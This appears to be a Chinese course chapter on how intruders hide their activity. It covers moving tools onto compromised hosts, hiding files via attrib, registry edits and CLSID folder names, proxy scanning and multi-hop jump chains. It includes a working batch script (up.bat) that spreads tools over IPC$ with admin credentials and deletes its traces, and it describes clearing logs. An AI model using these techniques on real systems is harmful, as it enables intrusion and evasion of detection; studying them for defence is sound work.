06隐藏技术.docx
- 文档编号:10447433
- 上传时间:2023-02-11
- 格式:DOCX
- 页数:21
- 大小:523.53KB
06隐藏技术.docx
《06隐藏技术.docx》由会员分享,可在线阅读,更多相关《06隐藏技术.docx(21页珍藏版)》请在冰豆网上搜索。
06隐藏技术
第六章隐藏技术
一、文件传输与文件隐藏技术
所谓“隐藏入侵”是指入侵者利用其他计算机代替自己执行扫描、漏洞溢出、连接建立、远程控制等操作。
入侵者把这种代替他们完成入侵任务的计算机称之为“肉鸡”,入侵者需要把他们常用的溢出、连接、控制等工具上传到肉鸡中执行,在隐藏技术中就涉及到入侵者如何将文件传输到肉鸡中并隐藏的问题。
1、IPC$文件传输
IPC$方法可以通过命令行、映射硬盘两种方式进行文件传输。
你还记得吗?
2、FTP传输
这种方式不需要肉鸡开放IPC$共享。
一个比较简单的类FTP服务的TFTP服务器,不需要设置账号和权限,是入侵者经常使用的文件传输方法。
Tftp全称为TrivialFileTransferProtocol,中文名叫简单文件传输协议。
大家可以从它的名称上看出,它适合传送“简单”的文件。
与FTP不同的是,它使用的是UDP的69端口,因此它可以穿越许多防火墙。
不过它也有缺点,比如传送不可靠、没有密码验证等。
虽然如此,它还是非常适合传送小型文件的。
演示:
利用TFTP传输文件
演示:
FTP服务器QuickEasyFTPServerV3.9.3的使用
附:
FTP命令用于连接FTP服务器。
(1)连接到ftp服务器
例如:
连接到ftp服务器
(2)上传文件
连接到ftp服务器后,就可以使用put命令上传文件到ftp服务器,使用get命令从ftp服务器下载文件了。
例如:
将本地主机C盘目录下的muma.exe文件上传到ftp服务器的根目录中。
(3)下载文件
例如:
从ftp服务器下载当前目录中的文件muma.exe,下载到本地d盘
(4)使用命令bye或quit中断连接或退出FTP
3、打包传输
入侵者可以将常用的入侵工具打包到传输到肉鸡中。
不过,如果要在肉鸡中将RAR、ZIP格式的压缩包解压,入侵者就需要使用命令行下的RAR、ZIP解压工具。
命令行下的压缩工具----rarx300。
下载rarx300后,自解压出rar文件夹,rar文件夹中的rar32.exe才是真正用来压缩和解压缩的程序。
压缩命令:
rar32a<生成的rar压缩文件><预压缩的文件或文件夹>
解压命令:
rar32x<要解压的rar文件><解压后存放路径>
例如:
rar32ac:
\hack.rarc:
\hack表示将c盘中的hack文件夹打包成hack.rar。
rar32xc:
\hack.rard:
\tools\表示将C盘中的压缩文件hack.rar解压到d盘的tools文件夹中。
其中,tools文件夹并不用事先建立,但不要忘记tools后面的“\”。
4、文件隐藏
入侵者将工具传到肉鸡上后,还需要使用“文件隐藏”技术把文件长期保留在肉鸡上。
入侵者如何隐藏文件呢?
(1)简单隐藏
右键单击要隐藏的文件夹,再点击“属性”,在属性中勾选“隐藏”。
或者使用命令:
attrib+h<文件>
此方法只有菜鸟为之,当然,也只能隐瞒菜鸟。
注意:
打开注册表编辑器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL分支,然后在右边的窗口中双击CheckedValue键值项,将它的键值修改为“0”,如果没有该健值的话,可以自己新建一个名为“CheckedValue”的“DWORD值”,然后将其值修改为“0”即可。
退出注册表编辑器,重新启动计算机,你就发现设置为“隐藏”属性的文件可以彻底隐身了,即使是在“文件夹选项”窗口中选择“显示所有文件”,隐藏的文件也不会显示出来了。
使用attrib命令为文件添加“隐藏”和“系统”属性。
命令格式为:
attrib+h+s<文件>
参数说明:
+h给文件添加隐藏属性
+s给文件添加系统属性
设置了“隐藏”和“系统”属性的文件或文件夹,只有在“文件夹选项”中同时设置“显示所有文件和文件夹”及“隐藏受保护的操作系统文件(推荐)”,才可以看到。
(2)利用专用文件夹隐藏文件
在windows系统中,可以双击“计划任务”、“控制面板”、“回收站”等图标来实现一些系统操作,实际上也可以把这些图标看成文件夹,与普通文件夹不同的是,该类文件夹属于系统专用。
实际上这些文件夹也可以用来存放文件,而且十分的隐蔽。
例如:
将c盘中的“黑客攻防指南.chm”文件复制到“字体”中。
(3)自建专用文件夹
例如:
把文件夹变成“网上邻居”
将要隐藏的文件夹改名为:
网上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D},回车后你将看到熟悉的“网上邻居”图标,双击后看一看,和桌面上的“网上邻居”一模一样。
原理说明:
Windows系统下有多种固定的类标识符代表系统文件,它在文件夹尾部时在windows下是不显示的,但在DOS下可见。
Windows中的文件标识符,其英文名称是CLSID,也称类标识符,位于注册表的[HKEY_LOCAL_MACHINE\Software\Classes\CLSID]下,通常由32个十六进制数构成,其一般格式是“{八位数-四位数-四位数-四位数-十二位数}”。
Windows中的每一个系统级应用程序(如“我的电脑”、“网上邻居”等)都有唯一的类标识符与之相对应。
我们操作电脑时,会对系统程序名称发出指令,Windows则通过对该程序的文件标识符识别而做出响应。
因此,文件标识符与系统程序是一一对应的关系。
常用的文件标识符:
计划任务:
.{d6277990-4c6a-11cf-8d87-00aa0060f5bf}
网上邻居:
.{208D2C60-3AEA-1069-A2D7-08002B30309D}
我的电脑:
.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
我的文档:
.{450D8FBA-AD25-11D0-98A8-0800361B1103}
拨号网络:
.{992CFFA0-F557-101A-88EC-00DD010CCC48}
控制面板:
.{21EC2020-3AEA-1069-A2DD-08002B30309D}
打印机:
.{2227A280-3AEA-1069-A2DE-08002B30309D}
记事本:
.{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}
回收站:
.{645FF040-5081-101B-9F08-00AA002F954E}
公文包:
.{85BBD920-42A0-1069-A2E4-08002B30309D}
字体:
.{BD84B380-8CA2-1069-AB1D-08000948F534}
Web文件夹:
.{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Excel文件:
.{00020811-0000-0000-c000-000000000046}
WAV文件:
.{00020C01-0000-0000-C000-000000000046}
如果需要恢复该文件夹,可采取两种方法:
方法1:
在命令提示符下,使用ren命令将该文件夹重命名。
方法2:
用WINRAR打开该文件夹所在的目录,然后将该文件夹重命名。
(3)创建一个既无法删除、又无法打开的文件夹
演示:
创建一个既无法删除、又无法打开、大小为0KB的文件夹
演示:
建立别人无法轻易访问和删除的100个文件夹,文件夹名称为1.到100.
for/l%%cin(1,1,100)domd%%c..\
附演示:
vbs整人代码
二、扫描隐藏技术
入侵的第一步就是信息搜集,信息搜集中最有效的方法就是扫描。
如何隐藏扫描,不让远程服务器发现真实IP地址是入侵者的关键任务。
通常,入侵者通过制作“扫描代理肉鸡”的方法来隐藏自己的扫描行为。
1、手工制作扫描代理
手工制作扫描代理是入侵者们制作扫描型肉鸡的通用方法,其思路就是把扫描器传输到肉鸡内部,然后入侵者通过远程控制使该肉鸡执行扫描程序。
入侵者通过这样方法能够实现“多跳”扫描,唯一的缺点就是操作比较麻烦,需要手工来敲入一条条命令来完成。
例如:
上传扫描器、登录、执行扫描、下载扫描结果
步骤:
(1)上传扫描器,如X-Scan
(2)登录。
可以使用Telnet登录到肉鸡。
(3)执行扫描。
使用X-Scan的命令行工具。
(4)下载扫描结果。
当扫描结束后,使用rar32对扫描结果进行打包。
完成打包后,在本地打开TFTP服务器,等待传输文件。
(5)完成后,删除过渡文件。
2、流光Sensor
流光Sensor是集成在流光扫描器中的工具,用来管理、制作扫描型肉鸡,功能非常强大。
只要获得远程主机的NT弱口令,入侵者便可以通过流光扫描器把该主机加入到流光Sensor中成为扫描型肉鸡,并能够对这些扫描型肉鸡进行统一管理。
演示:
添加NT弱口令主机到流光Sensor,利用肉鸡扫描,获取扫描结果
步骤:
(1)添加NT弱口令主机到流光Sensor,也就是将该主机做成了“扫描型肉鸡”,专门用来代替入侵者执行扫描任务。
(2)利用肉鸡进行扫描
操作方法:
(1)“工具”—“FluxaySensor工具”—“安装FluxaySensor…”
(2)单击“安装”,安装成功后,菜单“文件”—“高级扫描向导…”
(3)点击“选项”按钮。
三、入侵隐藏技术
入侵者为了隐藏自己,尽量不去直接与远程主机接触。
“代理”或“跳板”技术就是入侵者惯用的隐藏手段。
入侵者如何在入侵中隐藏自己?
1、什么是跳板?
跳板可称之为“入侵代理”或“入侵型肉鸡”。
它用来代替入侵者对远程主机建立网络连接或者漏洞溢出,这种间接的连接方式可以避免入侵者与远程主机的直接接触,从而实现了入侵的隐藏。
2、跳板结构
入侵者通过跳板一、跳板二与远程主机建立连接,也就是说,入侵者与远程主机之间的数据包都是通过“跳板一”、“跳板二”传输的,与远程主机直接接触的只有“跳板二”主机,因此,即使入侵行为被远程主机发觉,能够直接查出的也就只有“跳板二”主机,实现了入侵中的隐藏。
3、手工制作跳板
如何通过Windows系统自带的命令手工制作跳板?
演示一:
一级跳板(入侵者与远程主机之间只有一个肉鸡用来充当入侵跳板)的制作
任务分析:
入侵者要实现的目的是隐藏自己的IP地址。
可以通过远程控制肉鸡的方法来实现,Telnet便可以实现远程控制的目的。
入侵者的最终目的是成功获取远程主机的最高权限,无论采用何种入侵方式,都免不了使用一些入侵工具,入侵者在正式入侵远程主机之前,需要将一些入侵工具传输到一级跳板上。
当入侵者在完成任务的时候,还需要清除留下的入侵痕迹。
在入侵者离开一级跳板之前,还要删除入侵工具、清除远程主机以及跳板上的日志文件。
总结:
入侵者利用一级跳板对远程主机进行入侵的时候,需要先后实现“登录肉鸡”、“上传工具”、“执行入侵任务”、“删除工具”、“清除日志”等任务。
演示步骤:
(1)登录肉鸡
利用opentelnet打开肉鸡的Telnet服务、修改Telnet端口,去除NTLM验证,然后利用telnet命令登录肉鸡。
(2)上传工具
方法一:
TFTP方式
首先在本地(入侵者的电脑)建立TFTP服务器,然后在一级跳板中使用tftp命令将所需的工具下载到指定的文件夹中。
方法二:
copy命令
首先在本地(入侵者的电脑)与一级跳板之间建立IPC$连接,然后使用copy或xcopy命令将所需的工具复制到一级跳板中指定的文件夹中。
(3)执行入侵任务
(4)删除入侵工具
(5)清除日志文件。
演示二:
二级跳板的制作
对于二级或二级以上的跳板网络,在实现过程中有以下几点需要注意。
(1)由于跳板网络的制作过程只能在命令行的方式下进行,因此,不能使用图形界面方式的远程控制与入侵工具。
(2)对于上传到肉鸡跳板的入侵工具,需要尽可能压缩体积。
(3)当跳板网络级数很大的时候,最好使用bat文件来简化一条条命令的输入与执行。
(4)连接跳板和入侵的动作要尽可能的快,因为只要有一个跳板关机、重启,就会造成整个跳板网络的崩溃。
(5)尽量清除每个跳板上的入侵痕迹。
演示步骤:
(1)准备工具
Opentelnet:
用于打开每个肉鸡的Telnet服务、修改Telnet端口,去除NTLM验证。
rarx300:
用于压缩、解压入侵工具,以减小体积。
Tools.rar:
入侵远程主机所需的所有工具,在上传到跳板前使用rarx300进行压缩。
(2)编写bat文件
假设编写的bat文件命名为up.bat。
①由于在每次登录跳板前,需要使用opentelnet来打开下一个临近跳板的Telnet端口,因此,在bat文件中写入如下命令:
Opentelnet.exe\\%1%2%3122
说明:
%1:
表示将用于执行bat文件时输入的第一个参数代替
%2:
表示将用于执行bat文件时输入的第二个参数代替
%3:
表示将用于执行bat文件时输入的第三个参数代替
1:
表示NTLM验证方式为1
22:
表示打开跳板的22号端口用来进行telnet服务。
例如:
在MS-DOS中键入命令“up.bat2.2.2.2administrator123”相当于执行命令“opentelnet\\2.2.2.2administrator123122”。
②通过copy命令将所需工具从本地上传到肉鸡跳板一,再从肉鸡跳板一上传至肉鸡跳板二,等等。
在使用copy命令之前需要与下一个跳板建立IPC$连接。
因此,在bat文件中写入如下命令:
netuse\\%1\ipc$%3/user:
%2
copyrarx300.exe\\%1\admin$\rarx300.exe
copyopentelnet.exe\\%1\admin$\opentelnet.exe
copytools.rar\\%1\admin$\tools.rar
copyup.bat\\%1\admin$\up.bat
netuse*/delete
③删除文件
当入侵工具成功地传入到下一级跳板后,为了尽量减少当前跳板的注意,还需要把这些工具清除。
因此,在up.bat中写入如下命令:
delrarx300.exe
delopentelent.exe
deltools.rar
delup.bat
综上所述,up.bat文件的内容如下:
opentelnet.exe\\%1%2%3122
netuse\\%1\ipc$%3/user:
%2
copyrarx300.exe\\%1\admin$\rarx300
copyopentelnet.exe\\%1\admin$\opentelnet.exe
copytools.rar\\%1\admin$\tools.rar
copyup.bat\\%1\admin$\up.bat
netuse*/delete
delrarx300.exe
delopentelent.exe
deltools.rar
delup.bat
(3)制作跳板
使用命令“up.bat10.106.1.27administrator123”来制作第一个跳板。
假设一级肉鸡跳板的IP地址为10.106.1.27,管理员账号和密码分别为administration和123。
一级跳板制作成功后,通过命令“telnet10.106.1.2722”登录到一级肉鸡跳板。
进入一级跳板后,使用同样的方式进行二级跳板的制作。
(4)执行入侵任务
当登录到二级跳板后,就在跳板二上把所需的工具解压缩,准备入侵远程主机。
4、Scok5代理跳板
(1)什么是代理服务器?
普通的因特网访问是一个典型的客户机与服务器结构:
用户利用计算机上的浏览器向服务器发出请求,Web服务器响应请求并提供相应的数据。
代理服务器是介于浏览器和Web服务器之间的一台服务器,当你通过代理服务器上网浏览时,浏览器不是直接到Web服务器去取回网页,而是向代理服务器发出请求,由代理服务器再向Web服务器发出请求,并接收服务器返回的数据,存于代理服务器的硬盘中,然后再由代理服务器将数据传送给你的浏览器。
(2)使用代理服务器的好处
提高访问速度
因为客户要求的数据存于代理服务器的硬盘缓冲区中,因此下次这个客户或其它客户再要求相同目的站点的数据时,就会直接从代理服务器的硬盘中读取,代理服务器起到了缓存的作用,对热门站点有很多客户访问时,代理服务器的优势更为明显。
可以起到防火墙的作用
因为所有使用代理服务器的用户都必须通过代理服务器访问远程站点,因此在代理服务器上就可以设置相应的限制,以过滤或屏蔽掉某些信息。
这是局域网网管对局域网用户访问范围限制最常用的办法,也是局域网用户为什么不能浏览某些网站的原因。
拨号用户如果使用代理服务器,同样必须服从代理服务器的访问限制,除非你不使用这个代理服务器。
访问一些不能直接访问的网站
互联网上有许多开放的代理服务器,客户在访问权限受到限制时,而这些代理服务器的访问权限是不受限制的,刚好代理服务器在客户的访问范围之内,那么客户通过代理服务器访问目标网站就成为可能。
国内的高校多使用教育网,不能出国,但通过代理服务器,就能实现访问因特网,这就是高校内代理服务器热的原因所在。
隐藏真实身份
上网者也可以通过代理服务器隐藏自己的真实地址信息,还可隐藏自己IP,防止被黑客攻击。
(3)代理服务器主要类型
HTTP代理:
最简单的一种代理形式,能够代理客户机的HTTP访问,上网浏览网页使用的都是HTTP协议,通常的HTTP代理端口为80、3128或8080端口。
SOCKS代理:
采用Socks协议的代理服务器就是Socks服务器。
它只是简单地传递数据包,而并不关心是何种应用协议,既可以是HTTP协议,也可以是FTP协议,或者其他任何协议,所以SOCKS代理服务器比其他类型的代理服务器速度要快得多。
SOCKS代理又分为SOCKS4和SOCKS5,二者不同的是SOCKS4代理只支持TCP协议(即传输控制协议),而SOCKS5代理则既支持TCP协议又支持UDP协议(即用户数据包协议),还支持各种身份验证机制、服务器端远程域名解析等。
目前SOCKS5是最常用的一种SOCKS代理,Socks代理端口通常为1080。
(4)搜索代理服务器
工具:
代理猎手ProxyHunterV3.1
网站:
无忧代理()
演示:
利用ProxyHunterV3.1搜索代理服务器
(5)代理服务器的设置
要设置代理服务器,必须先知道代理服务器地址和端口号,然后在IE或NC的代理服务器设置栏中填入相应地址和端口号就可以了。
当客户再次浏览网页时,就会自动向你设定的代理服务器发出申请,并得到数据,在浏览网站时,无论是IE或是NC都可以在浏览器状态栏中清楚地看到先连代理服务器,再连目标网站的过程。
在IE中设置代理服务器
打开IE浏览器,选择菜单栏的“工具”---“Internet选项…”,对于ADSL拨号用户来说,选择一个网络连接后,点击“设置”按钮,如下图所示,选中代理服务器,填入地址和端口号。
对于局域网用户来说,需要点击“局域网设置”,如下图所示,选中代理服务器,填入地址和端口号。
在FireFox中设置代理服务器
打开FireFox浏览器,选择菜单栏的“工具”---“选项…”,选择“高级/网络”,点击“设置”,就可进行代理服务器的设置了,选中“手动配置代理”,然后填写代理服务器的地址和端口。
(5)如何通过Sock5代理服务器实现入侵中的隐身?
演示一:
只有一台Sock5代理的跳板网络
攻击模型:
演示步骤:
(1)获取一台肉鸡跳板和一台Sock5代理服务器
入侵者需要一台肉鸡跳板和一台Sock5代理服务器来组建跳板网络。
肉鸡跳板应该能够提供Telnet服务以及常用的入侵工具。
使用专门的Sock5代理公布软件来获取高速、稳定的Sock5代理服务器。
通过代理公布器,入侵者便可以轻松获得Sock5代理服务器,甚至是国外的Sock5代理服务器,在使用Sock5代理服务器之前验证其是否正常工作,以及该代理服务器的速度。
方法如下:
打开QQ---“网络设置”----填入代理服务器的IP地址以及端口号进行测试。
(2)登录肉鸡跳板
入侵者可利用远程登录软件S-Term登录到肉鸡跳板。
S-Term是一款优秀的Telnet终端,在S-Term中可以自由设置登录端口号,设置一些关于Sock5代理的参数等。
①开启肉鸡Telnet服务,并上传入侵工具
②设置S-Term中的Sock代理,准备登录肉鸡跳板。
③Telnet登录到肉鸡跳板
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 06 隐藏 技术